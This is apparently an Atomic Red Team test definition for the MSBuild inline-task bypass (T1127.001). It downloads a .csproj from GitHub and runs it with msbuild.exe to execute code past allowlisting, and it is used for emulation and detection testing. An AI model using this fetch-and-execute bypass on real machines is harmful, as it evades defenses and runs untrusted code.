#TechniqueName: Trusted Developer Utilities Proxy Execution: MSBuild
#AtomicTestName: MSBuild Bypass Using Inline Tasks
#Language: cmd

#get_prereq_commands
New-Item -Type Directory (split-path PathToAtomicsFolder\T1127.001\src\T1127.001.csproj) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "PathToAtomicsFolder\T1127.001\src\T1127.001.csproj"


#prereq_commands
if (Test-Path PathToAtomicsFolder\T1127.001\src\T1127.001.csproj) {exit 0} else {exit 1}


#commands
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe PathToAtomicsFolder\T1127.001\src\T1127.001.csproj

